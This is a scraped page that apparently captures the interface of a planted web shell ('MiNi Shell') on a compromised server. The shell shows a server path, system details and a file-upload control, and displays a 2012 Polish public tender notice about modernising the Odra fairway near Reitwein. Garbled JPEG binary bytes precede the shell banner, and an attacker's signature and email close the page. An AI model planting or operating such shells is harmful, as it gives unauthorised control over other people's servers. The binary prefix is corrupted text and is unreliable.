JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120530/180488-N-2012.html

<p class="kh_header"><b>Szczecin: Modernizacja szlaku żeglownego na Odrze swobodnie płynącej w celu zimowego lodołamania: Rejon m. Reitwein, rz. Odra km 604,0 - 605,0</b><br>
<b>Numer ogłoszenia: 180488 - 2012; data zamieszczenia: 30.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Zarząd Gospodarki Wodnej w Szczecinie , ul. Tama Pomorzańska 13A, 70-030 Szczecin, woj. zachodniopomorskie, tel. 091 4411200, faks 091 4411300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzgw.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja szlaku żeglownego na Odrze swobodnie płynącej w celu zimowego lodołamania: Rejon m. Reitwein, rz. Odra km 604,0 - 605,0.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie dokumentacji p.n.: Modernizacja szlaku żeglownego na Odrze swobodnie płynącej w celu zimowego lodołamania: Rejon m. Reitwein, rz. Odra km 604,0 - 605,0 oznaczonej kodem CPV - 71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej oraz przeniesienie autorskich praw majątkowych do wykonanej  dokumentacji. 
W skład przedmiotu zamówienia wchodzą następujące opracowania:
1)	Opracowanie wniosku o ustaleniu lokalizacji inwestycji celu publicznego.
2)	Karta informacyjna przedsięwzięcia.
3)	Inwentaryzacja drzew i krzewów wraz z wnioskiem o wydanie zezwolenia na usunięcie drzew lub krzewów.
4)	Koncepcja techniczno- kosztowa dla zadania p.n.: Modernizacja szlaku żeglownego na Odrze swobodnie płynącej w celu zimowego lodołamania: Rejon m. Reitwein, rz. Odra km 604,0 - 605,0 .
2.	Szczegółowy zakres opracowań:
1)	Opracowanie wniosku o ustaleniu lokalizacji inwestycji celu publicznego.
Opracowanie kompletnego wniosku o wydanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego należy wykonać zgodnie z Ustawą z dnia 27.03.2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 r., Nr 80 poz. 717 z późn. zm.).
Zakres wniosku wraz z wymaganymi załącznikami ma być zgodny z wymaganiami organu właściwego do wydania decyzji o ustaleniu lokalizacji inwestycji celu publicznego.
Wykonawca jest zobowiązany dostarczyć Zamawiającemu wniosek o wydanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego w 3 egz. w wersji papierowej oraz w 1 egz. w wersji elektronicznej (na nośniku CD bądź DVD) - część rysunkową w formacie dwg i pdf, a część opisową w formacie pdf i doc. 
2)	Karta Informacyjna Przedsięwzięcia dla zadania p.n.:  Modernizacja szlaku żeglownego na Odrze swobodnie płynącej w celu zimowego lodołamania: Rejon m. Reitwein, rz. Odra
km 604,0 - 605,0 wraz z załącznikami.
Zakres karty informacyjnej planowanego przedsięwzięcia ma być zgodny z art. 3 ust. 1 pkt 5 ustawy z dnia 3.10.2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008 r., nr 199, poz. 1227 z póź. zm.).
W skład niezbędnych załączników wchodzi:
a.  poświadczona przez właściwy organ kopia mapy ewidencyjnej obejmująca przewidywany teren, na którym będzie realizowane przedsięwzięcie, oraz obejmująca obszar, na który będzie oddziaływać przedsięwzięcie;
b.  wypis i wyrys z miejscowego planu zagospodarowania przestrzennego, jeżeli plan ten został
     uchwalony, albo informacji o jego braku;
Karta informacyjna ma być opracowana zgodnie z wymaganiami stawianymi dla tego typu dokumentacji oraz z wymaganiami Organu właściwego do wydania decyzji o środowiskowych uwarunkowaniach inwestycji. Wykonawca powinien przewidzieć możliwość poprawy opracowania zgodnie z uwagami Organu.
Wykonawca jest zobowiązany dostarczyć Zamawiającemu Kartę Informacyjną Przedsięwzięcia 
w 5 egz. w wersji papierowej oraz w 1 egz. w wersji elektronicznej (na nośniku CD bądź DVD) - część rysunkową w formacie dwg i pdf, a część opisową w formacie pdf i doc. 
3)	Inwentaryzacja drzew i krzewów wraz z wnioskiem o wydanie zezwolenia na usunięcie drzew lub krzewów.
Inwentaryzację drzew i krzewów należy wykonać w obrębie planowanego przedsięwzięcia. Wykaz zinwentaryzowanych drzew i krzewów powinien zawierać następujące informacje: gatunek drzewa, obwód pnia na wysokości 1,30 m, powierzchnię krzewu w m2, numer ewidencyjny działki, właściciela działki, lokalizację geograficzną (współrzędne) oraz stan drzewa lub krzewu. Wykaz drzew należy sporządzić w formie tabelarycznej. Zinwentaryzowane drzewa należy zaznaczyć na dostarczonym wtórniku. 
Wniosek o wydanie zezwolenia na usunięcie drzew lub krzewów (dotyczy tych które kolidują z planowanym przedsięwzięciem) należy wykonać  zgodnie z Ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U. z 2009 r., Nr 151, poz. 1220 z późn. zm.).
Zakres wniosku wraz z wymaganymi załącznikami ma być zgodny z wymaganiami organu właściwego do wydania zezwolenia na usunięcie drzew lub krzewów. W przypadku stwierdzenia przez organ właściwy do wydania wyżej wymienionego zezwolenia, braków lub błędów w złożonym wniosku, Wykonawca zobowiązany jest je usunąć w terminie określonym przez organ, bez dodatkowych opłat. 
UWAGA! Rozgałęzienia pni, które będą do wysokości 1,3 m należy traktować jako pojedyncze drzewa. Należy również podać ilość karczy do usunięcia. Drzewa i krzewy przeznaczone do usunięcia należy oznaczyć w terenie.
Wykonawca jest zobowiązany dostarczyć Zamawiającemu inwentaryzację drzew i krzewów wraz z wnioskiem o wydanie zezwolenia na usunięcie drzew lub krzewów - 5 egz. w wersji papierowej oraz 3 egz. w wersji elektronicznej (na nośniku CD bądź DVD), część opisową w formacie pdf i doc, a część rysunkową w formacie pdf oraz w formacie shp (lokalizacja drzew przeznaczonych do usunięcia w układzie współrzędnych WGS84 lub PUWG92).
4)	Koncepcja techniczno-kosztowa dla zadania p.n.: Modernizacja szlaku żeglownego na Odrze swobodnie płynącej w celu zimowego lodołamania: Rejon m. Reitwein, rz. Odra km 604,0 - 605,0.
Koncepcja techniczno-kosztowa powinna obejmować analizę w przedmiotowym odcinku łuku wklęsłego jako całości, a w szczególności teren od ostrogi 8/604 do ostrogi 10/606. Zaproponowany rodzaj budowli powinien modernizować szlak żeglowny na Odrze swobodnie płynącej w celu zimowego lodołamania przy jednoczesnym najmniejszym  wpływie  na środowisko. Koncepcja powinna pokazywać miejsca, w których należy wykonać budowle, określać rodzaj oraz kolejność ich wykonania. Część techniczna koncepcji musi być opracowana minimum w dwóch wariantach. Dla każdego opracowanego wariantu należy wykonać zbiorcze zestawienie wszystkich kosztów. Część kosztowa koncepcji powinna zawierać wszystkie składniki kosztowe, które związane są z realizacją inwestycji.Przedstawione warianty powinny zawierać propozycje dające możliwość wyboru optymalnego rozwiązania uwzględniającego koszt inwestycji oraz wpływ na środowisko. 
Dokumentacja musi uwzględniać następujące opracowania dotyczące podmiotowego odcinka:
a)	Skrócona ekspertyza p.n.: Naprawa ostróg koło Reitwein (od km 605) opracowana przez BAW Karlsruhe, 2007;
b)	Sprawozdanie p.n.: Optymalizacja zabudowy regulacyjnej na odcinku rzeki Odry od km 603,0 do km 617,0 opracowane przez BAW Karlsruhe, 2006;
c)	Dokumentacja p.n.: Opracowanie koncepcji trasy regulacyjnej na granicznym odcinku rzeki Odry od km 542,4 do km 706,0 w celu uzyskania minimalnej głębokości 1,8m opracowane przez Fundację na rzecz rozwoju Politechniki Szczecińskiej, 2008;
d)	Dokumentacja p.n.: Uszczegółowienie koncepcyjnego rozwiązania trasy regulacyjnej koryta SSQ na granicznym odcinku rzeki Odry km od 542,4 do 704,1 część opisowo- tabelaryczna opracowane przez Politechnikę Warszawską Instytut Zaopatrzenia w Wodę i Budownictwa Wodnego Zakład Budownictwa Wodnego, 1993;
e)	Dokumentacja p.n.: Uszczegółowienie koncepcyjnego rozwiązania trasy regulacyjnej koryta SSQ na granicznym odcinku rzeki Odry km od 542,4 do 704,1 część graficzna A; B opracowane przez Politechnikę Warszawską Instytut Zaopatrzenia w Wodę i Budownictwa Wodnego Zakład Budownictwa Wodnego, 1993;
f)	Raport objaśniający p.n.: Procedura zatwierdzenia planu prawnie wiążącego dla przedsięwzięcia naprawczego Odra Reitwein (od km 604,6 do 605,5) opracowana przez Federalną Administrację Wodno- Żeglugową Urząd Wodno- Żeglugowy Eberswalde, 2012.
Wykonawca jest zobowiązany dostarczyć Zamawiającemu Koncepcję w 4 egz. w wersji papierowej oraz 1 egz. w wersji elektronicznej (na nośniku CD bądź DVD) - część rysunkową w formacie DWG i PDF, a część opisowa w formacie doc. i PDF. 
Uwaga: 
Zamawiający posiada mapę sytuacyjno-wysokościową do celów projektowych (wtórnik) oraz sondaże wykonane w 2007 r. dla obiektu: Rzeka Odra km 603,0 do 605,4. Wykonawca musi wykonać aktualizację wtórnika oraz planszetu sondażowego. Zaktualizowaną mapę sytuacyjno-wysokościową do celów projektowych (wtórnik) należy zarejestrować w odpowiednim Ośrodku Dokumentacji Geodezyjnej i Kartograficznej. Opracowanie musi spełnić warunki ustawy z dnia 17 maja 1989r. Prawo Geodezyjne i Kartograficzne (Dz.U. z 2010 r. Nr 193 poz. 1287). Planszet sondażowy powinien obejmować obszar planowanego przedsięwzięcia.
Wykonawca jest zobowiązany dostarczyć Zamawiającemu zaktualizowaną mapę sytuacyjno- wysokościową dla celów projektowych wraz z planszetem sondażowym w 1 egz. w wersji papierowej oraz w 1 egz. w wersji elektronicznej (na nośniku CD bądź DVD) - część rysunkową w formacie dwg i pdf, a część opisową (karta rejestracyjna) w formacie pdf i doc. 
3.	Uwagi ogólne do dokumentacji:
1)	Dokumentacja musi być opracowana w sposób zgodny z obowiązującymi Polskimi Normami, zasadami wiedzy technicznej.
2)	Zamawiający zastrzega sobie prawo do systematycznego wglądu do dokumentacji w trakcie jej wykonywania.
4.	Przeniesienie autorskich praw majątkowych do dokumentacji. 
1)	Wykonawca zobowiązuje się przenieść na Zamawiającego autorskie prawa majątkowe do opracowań, wchodzących w skład przedmiotu umowy, zgodnie z ustawą z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz. U. z 2006 r. Nr 90, poz. 631, z późn. zm.) na następujących polach eksploatacji:
a.	utrwalanie, zwielokrotnianie i dokonywanie zmian w opracowaniach oraz w ich kopiach
w jakiejkolwiek postaci;
b.	wprowadzania do obrotu oryginału, kopii oraz zmienionej kopii opracowań;
c.	najmu lub użyczania egzemplarzy opracowań;
d.	udostępnianie opracowań do percepcji innym podmiotom;
e.	publicznego udostępniania opracowań w taki sposób, aby każdy mógł mieć do nich dostęp
     w miejscu i w czasie przez siebie wybranym.
2)	Przeniesienie na Zamawiającego autorskich praw majątkowych do opracowań, nastąpi z chwilą ich odbioru przez Zamawiającego.
3)	Zamawiającemu będzie przysługiwało prawo do dokonywania jakichkolwiek zmian w opracowaniach bez zgody ich twórców.
4)	Zamawiającemu będzie przysługiwało wyłączne prawo zezwalania na wykonywanie zależnych praw autorskich dotyczących opracowań.
5. Materiały, które Zamawiający udostępni wyłonionemu w postępowaniu Wykonawcy:
1)	Skrócona ekspertyza p.n.: Naprawa ostróg koło Reitwein (od km 605) opracowana przez BAW
   Karlsruhe, 2007;
2)	Sprawozdanie p.n.: Optymalizacja zabudowy regulacyjnej na odcinku rzeki Odry od km 603,0 do
   km 617,0 opracowane przez BAW Karlsruhe, 2006;
3)	Dokumentacja p.n.: Opracowanie koncepcji trasy regulacyjnej na granicznym odcinku rzeki
  Odry od km 542,4 do km 706,0 w celu uzyskania minimalnej głębokości 1,8m opracowane przez
  Fundację na rzecz rozwoju Politechniki Szczecińskiej, 2008;
4)	Dokumentacja p.n.: Uszczegółowienie koncepcyjnego rozwiązania trasy regulacyjnej koryta
  SSQ na granicznym odcinku rzeki Odry km od 542,4 do 704,1 część opisowo- tabelaryczna
  opracowane przez Politechnikę Warszawską Instytut Zaopatrzenia w Wodę i Budownictwa
  Wodnego Zakład Budownictwa Wodnego, 1993;
5)	Dokumentacja p.n.: Uszczegółowienie koncepcyjnego rozwiązania trasy regulacyjnej koryta
  SSQ na granicznym odcinku rzeki Odry km od 542,4 do 704,1 część graficzna A; B opracowane
  przez Politechnikę Warszawską Instytut Zaopatrzenia w Wodę i Budownictwa Wodnego Zakład
  Budownictwa Wodnego, 1993;
6)	Raport objaśniający p.n.: Procedura zatwierdzenia planu prawnie wiążącego dla przedsięwzięcia
  naprawczego Odra Reitwein (od km 604,6 do 605,5) opracowana przez Federalną Administrację
  Wodno- Żeglugową Urząd Wodno- Żeglugowy Eberswalde, 2012;
7)	Mapa sytuacyjno- wysokościowa (wtórnik) do celów projektowych wykonany dla obiektu: Rzeka
  Odra km 603,0 do 605,4 (aktualność wtórnika na dzień 17.12.2007r.); 
8)	Planszet sondażowy wykonany w 2007 roku dla odcinka Rzeki Odry km 603,0 do 605,4..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, musi wykazać, iż w ciągu ostatnich trzech lat przed dniem otwarcia ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych wykonuje 1 pracę podobną do przedmiotu zamówienia.
Za pracę podobną Zamawiający uzna: wykonanie koncepcji, projektu budowlanego lub projektu wykonawczego w zakresie których były projektowane budowle regulacyjne, podając ponadto, wartość, przedmiot, datę wykonania, podmiot zlecający oraz dokument potwierdzający, że praca została wykonana lub jest wykonywana należycie. 
Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie  
      potwierdzających go dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponował w wykonywaniu zamówienia  co najmniej jedną osobą posiadającą uprawnienia projektowe budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej, która wykonała w okresie ostatnich trzech lat co najmniej 1 pracę podobną do przedmiotu zamówienia.
Za pracę podobną zamawiający uzna: wykonanie koncepcji, projektu budowlanego lub projektu wykonawczego w zakresie których były projektowane budowle regulacyjne. Ponadto Wykonawca ma przekazać następujące informacje dotyczące wskazanej osoby: imię i nazwisko, kwalifikacje zawodowe, wykaz wykonanych przez nią prac, oraz informację o podstawie do dysponowania tą osobą.
         Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie  
      potwierdzających go dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.oferta cenowa 2.odpowiednie pełnomocnictwa</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzgw.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Zarząd Gospodarki Wodnej w Szczecinie, ul. Tama Pomorzańska 13A, 70-030 Szczecin, Zespół ds. zamówień pok. nr 128..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 11:00, miejsce: Regionalny Zarząd Gospodarki Wodnej w Szczecinie, ul. Tama Pomorzańska 13A, 70-030 Szczecin, Zespół ds. zamówień pok. nr 128..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com